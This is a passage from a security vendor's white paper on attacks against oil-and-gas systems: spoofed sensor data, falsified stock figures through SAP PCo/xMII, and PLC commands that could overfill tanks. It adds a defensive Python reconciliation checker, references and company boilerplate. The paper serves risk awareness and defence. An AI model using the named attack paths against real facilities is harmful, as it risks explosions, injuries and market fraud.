case may cost companies millions and disrupt the whole business. Even if there are no vulnerabilities
in the components of the industrial systems, insecure configurations and unpatched business
applications may expose a company to the following risks:

Plant equipment sabotage

Hackers can fake data about temperature, pressure and other conditions. For example, they can spoof
a report about a problem with equipment in a remote facility. A company will spend a lot of time and
money investigating the incident if the facility is situated somewhere in the middle of the ocean. This
can be done by exploiting the vulnerabilities described in this report; the easiest way is to compromise
the asset management solution.

Company Sabotage
Hackers can send fake information about oil quantities to managers who take decisions based on
this data.

Assume that every day someone reports that there is much more oil in stock than the company
actually has. One day, the company will have sold all the oil and will not be able to deliver it to
customers. The failure to meet its obligations could lead to a global scandal, changes in oil prices
and huge losses. Some tank information management solutions feature commands to PLC
devices that change values such as the maximum filling limit of tanks. In that case, hackers can send
those commands and carry out an attack that overfills a tank and can lead to an explosion.
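The falsified-stock scenario above, as an added example (not from the paper and not a feature of any SAP or Emerson product): a mass-balance reconciliation in Python that compares the stock figure the ERP received with two independently measured quantities, the tank gauge level and the custody-transfer totals from the flow computer, and with the tank's physical capacity. The tank T-101, its strapping factor, the 50 m3 tolerance and the four daily records are constructed; in the records the reported figure is inflated a little more each day and then jumps above capacity.

```python
"""Mass-balance reconciliation of the stock figure reported to the ERP against
measurements that reach the checker on an independent path.

Added example; not part of the paper and not code from any SAP or Emerson product.
The tank, its strapping factor, the tolerance and the daily records are constructed
for illustration.
"""
from dataclasses import dataclass

TOLERANCE_M3 = 50.0   # assumed acceptable gauge/meter discrepancy


@dataclass(frozen=True)
class Tank:
    name: str
    capacity_m3: float
    m3_per_m: float      # strapping factor: cubic metres per metre of level (assumed linear)


@dataclass(frozen=True)
class DayRecord:
    day: str
    reported_stock_m3: float   # figure that reached the ERP (e.g. through PCo/xMII)
    gauge_level_m: float       # level read from the tank gauging system directly
    receipts_m3: float         # custody-transfer receipts totalised by the flow computer
    deliveries_m3: float       # custody-transfer deliveries totalised by the flow computer


def reconcile(tank: Tank, opening_stock_m3: float, records) -> list:
    """Returns findings as (day, rule, reported_m3, expected_m3), one per violated rule.

    Rule 1: a reported stock above the tank's capacity is physically impossible.
    Rule 2: reported stock must track opening stock + metered receipts - metered deliveries;
            the balance is cumulative, so a slow daily inflation is caught once it adds up.
    Rule 3: reported stock must agree with the stock implied by the tank gauge.
    """
    findings = []
    book_stock = opening_stock_m3
    for r in records:
        book_stock += r.receipts_m3 - r.deliveries_m3
        gauged = r.gauge_level_m * tank.m3_per_m
        if r.reported_stock_m3 > tank.capacity_m3:
            findings.append((r.day, "exceeds capacity", r.reported_stock_m3, tank.capacity_m3))
        if abs(r.reported_stock_m3 - book_stock) > TOLERANCE_M3:
            findings.append((r.day, "reported vs meter balance", r.reported_stock_m3, book_stock))
        if abs(r.reported_stock_m3 - gauged) > TOLERANCE_M3:
            findings.append((r.day, "reported vs gauge", r.reported_stock_m3, gauged))
    return findings


def suspicious_days(findings) -> list:
    """Days with at least one finding, in order."""
    return sorted({day for day, *_ in findings})


TANK = Tank("T-101", capacity_m3=10_000.0, m3_per_m=500.0)   # constructed


def sample_records() -> list:
    """Constructed: the reported figure is inflated a little more each day, then jumps;
    receipts and deliveries are the metered custody-transfer volumes."""
    return [
        DayRecord("d1", reported_stock_m3=5100.0, gauge_level_m=10.2, receipts_m3=400.0, deliveries_m3=300.0),
        DayRecord("d2", reported_stock_m3=4640.0, gauge_level_m=9.2, receipts_m3=0.0, deliveries_m3=500.0),
        DayRecord("d3", reported_stock_m3=5090.0, gauge_level_m=10.0, receipts_m3=600.0, deliveries_m3=200.0),
        DayRecord("d4", reported_stock_m3=10500.0, gauge_level_m=10.0, receipts_m3=0.0, deliveries_m3=0.0),
    ]


if __name__ == "__main__":
    for finding in reconcile(TANK, 5000.0, sample_records()):
        print(finding)
```

The per-day tolerance alone lets the 40 m3 inflation on d2 through; the cumulative meter balance catches it on d3 once the drift has added up, and the capacity rule flags the impossible figure on d4 outright. The check is only worth anything if the gauge and meter readings reach it by a path that an attacker who controls the PCo/xMII feed cannot also write, for instance read directly from the tank gauging system and the flow computer rather than taken from the same SAP tables.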

Plant Destruction
BMS and some other critical systems are used in numerous processes, including separation and refining.
Some of these critical systems not only send information but can also be managed remotely through
third-party systems like ERP, EAS and LIMS via the intermediate systems SAP PCo and SAP xMII,
and some solutions allow particular commands to be sent to a PLC from the ERP/MES system. PCo
provides a framework for creating custom agents, which can be used to send commands to a PLC. This is
one way to attack ICS even if there are no vulnerabilities in the PLC/SCADA/DCS.

Vulnerabilities in industrial systems can be exploited by anyone who gains access to the industrial
network because of insecure separation between the IT and OT networks. A company then faces all the
risks listed at the beginning of the document:

• Plant sabotage/shutdown
• Equipment damage
• Utilities interruption
• Production disruption (stopping or pausing the manufacturing process)
• Product quality (bad oil and gas quality)
• Undetected spills
• Illegal tapping
• Compliance violation (pollution)
• Safety violation (death or injury)

Oil market fraud

Imagine what would happen if a cyber criminal uploaded malware that dynamically changes oil stock
information in all oil and gas companies where SAP is implemented. According to SAP's own statement,
companies using SAP solutions produce more than 70 million barrels of oil per day, while the Oil Market
Report puts total oil production at over 94 million barrels per day. If the attack succeeded, cyber
criminals would control the reported stock figures behind about 75% of total oil production. They could
deliberately understate the oil in stock at the affected companies to increase oil prices, or vice versa.

The attacks described can be conducted by exploiting SAP xMII and SAP Plant Connectivity, the solutions
that transfer data from tank management systems to SAP systems such as SAP IS-Oil. With this
multi-stage attack, cyber criminals can modify the parameters describing oil quantities in stock. More
importantly, SAP systems are connected with tank information management solutions. Some of them,
such as Emerson Rosemount TankMaster, allow commands to PLC devices that change values like the
maximum filling limit of tanks. In that case, by gaining access to the tank management system, hackers
can send these commands and carry out an attack that can lead to an explosion.

References
1. Hackers' Favorite Target: Big Oil and All That Deadly Equipment. http://www.bloomberg.com/news/articles/2015-06-10/hackers-favorite-target-big-oil
2. The GasPot Experiment: Unexamined Perils in Using Gas-Tank-Monitoring Systems. https://www.blackhat.com/docs/us-15/materials/us-15-Wilhoit-The-Little-Pump-Gauge-That-Could-Attacks-Against-Gas-Pump-Monitoring-Systems-wp.pdf
3. Telvent Hit by Sophisticated Cyber-Attack, SCADA Admin Tool Compromised. http://www.securityweek.com/telvent-hit-sophisticated-cyber-attack-scada-admin-tool-compromised
4. Hackers Launch All-Out Assault on Norway's Oil and Gas Industry. http://motherboard.vice.com/read/hackers-target-300-norwegian-oil-and-energy
5. Internet attack could shut down US gas stations. http://arstechnica.com/security/2015/01/internet-attack-could-shut-down-us-gasoline-stations/
6. Oil and Gas Production Handbook. http://www.saudienergy.net/PDF/Intro%20Oil.pdf
7. Data Sheet "Net Oil & Gas Solution". http://iom.invensys.com/EN/pdfLibrary/Datasheet_Foxboro_Net%20Oil%20and%20Gas%20Solution_10-13.pdf
8. Burner Management System Solutions. http://iom.invensys.com/EN/pdfLibrary/Brochure_Triconex_BurnerManagementSystemSolutions_08-10.pdf
9. Burner Management Systems. http://www2.emersonprocess.com/en-us/brands/deltav/sis/applications/pages/bms.aspx
10. Burner Management System SIMATIC BMS400F. http://www.industry.usa.siemens.com/topics/us/en/bms/bmsinformation/Documents/BMSBrochureAPPROVED.pdf
11. Burner Management System (BMS) - Safety Solution for the Power Generation Industry. https://www.honeywellprocess.com/en-US/explore/products/control-monitoring-and-safety-systems/safety-systems/Pages/burner-management-system.aspx
12. Custody transfer. https://en.wikipedia.org/wiki/Custody_transfer
13. Oil and Gas Custody Transfer. http://www2.emersonprocess.com/siteadmincenter/PM%20Articles/Oil-and-Gas-Custody-Transfer_petroleum_africa_may_2014.pdf
14. Best Practices for DanPac Express Cyber Security. http://www2.emersonprocess.com/siteadmincenter/PM%20Daniel%20Documents/Whitepaper_DanPac%20Express%20Cyber%20Security%20Best%20Practices.pdf
15. FloBoss S600+ Flow Computer. http://www.documentation.emersonprocess.com/groups/public/documents/specification_sheets/d301151x012.pdf
16. Oil refinery. https://en.wikipedia.org/wiki/Oil_refinery
17. Oracle Field Service. http://www.oracle.com/us/products/applications/056938.pdf
18. Analysis of 300 vulnerabilities in SAP. http://erpscan.com/wp-content/uploads/publications/3000-SAP-notes-Analysis-by-ERPScan.pdf

Additional reading
• The GasPot Experiment: Unexamined Perils in Using Gas-Tank-Monitoring Systems
–– https://www.blackhat.com/docs/us-15/materials/us-15-Wilhoit-The-Little-Pump-Gauge-That-Could-Attacks-Against-Gas-Pump-Monitoring-Systems-wp.pdf
• Rocking the Pocket Book: Hacking Chemical Plant for Competition and Extortion
–– https://www.blackhat.com/docs/us-15/materials/us-15-Krotofil-Rocking-The-Pocket-Book-Hacking-Chemical-Plant-For-Competition-And-Extortion.pdf
–– http://blackhat.com/docs/us-14/materials/us-14-Larsen-Miniturization.pdf
• Physical Damage 101: Bread and Butter Attacks
–– https://www.blackhat.com/docs/us-15/materials/us-15-Larsen-Remote-Physical-Damage-101-Bread-And-Butter-Attacks.pdf

About ERPScan
ERPScan is the most respected and credible Business Application Security provider. Founded in 2010,
the company operates globally. Named an 'Emerging vendor' in Security by CRN and distinguished by
more than 30 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf, helping to improve the security of its
latest solutions.

ERPScan's primary mission is to close the gap between technical and business security, and to provide
solutions to evaluate and secure ERP systems and business-critical applications from both cyber-attacks
and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies and managed
service providers whose requirement is to actively monitor and manage the security of vast SAP landscapes
on a global scale.

Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi-award-winning software
is the only solution on the market certified by SAP SE that covers all tiers of SAP security, i.e. vulnerability
assessment, source code review and Segregation of Duties. The largest companies from diverse industries
like oil and gas, banking and retail, even nuclear power installations, as well as consulting companies have
successfully deployed the software. ERPScan Monitoring Suite for SAP is specifically designed for
enterprise systems to continuously monitor changes in multiple SAP systems. It generates and analyzes
trends on user-friendly dashboards, manages risks and tasks, and can export results to external systems.
These features enable central management of SAP system security with minimal time and effort.

We use the 'follow the sun' principle and operate from two hubs, located in the Netherlands and the US,
which run local offices and a partner network spanning 20+ countries around the globe. This enables us to
monitor cyber threats in real time while providing agile customer support.

Research Team
The company's expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability
research and analysis of critical enterprise applications. It has received multiple acknowledgments from
the largest software vendors, such as SAP, Oracle, Microsoft, IBM, VMware and HP, for exposing in excess
of 400 vulnerabilities in their solutions (200 of them in SAP alone).

ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking
Techniques 2012) and were nominated for best server-side vulnerability at BlackHat 2013.

ERPScan experts have been invited to speak, present and train at 60+ prime international security
conferences in 25+ countries across the continents. These include BlackHat, RSA and HITB, as well as
private trainings for SAP in several Fortune 2000 companies.

ERPScan researchers lead the EAS-SEC project, which is focused on enterprise application security research
and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.

ERPScan experts have been interviewed by leading media resources and specialized info-sec publications
worldwide, including Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise
and Chinabyte, to name a few.

We have highly qualified experts on staff with experience in many different fields of security, from web
applications and mobile/embedded to reverse engineering and ICS/SCADA systems, and they pool that
experience to conduct research in SAP system security.

Our Contacts
Global Headquarters: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

EMEA Headquarters: Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam

Phone: +31 20 8932892

Twitter: @erpscan

Web: www.erpscan.com

Contact: [email protected]

PR: [email protected]

Products
• ERPScan Security Monitoring Suite for SAP
• ERPScan Security Scanner for SAP
• ERPScan Security Monitoring Suite for Oracle Peoplesoft

Services
• SAP Vulnerability Assessment
• SAP Security Audit
• SAP Security Trainings
• SAP Custom code security review
• SAP Penetration testing
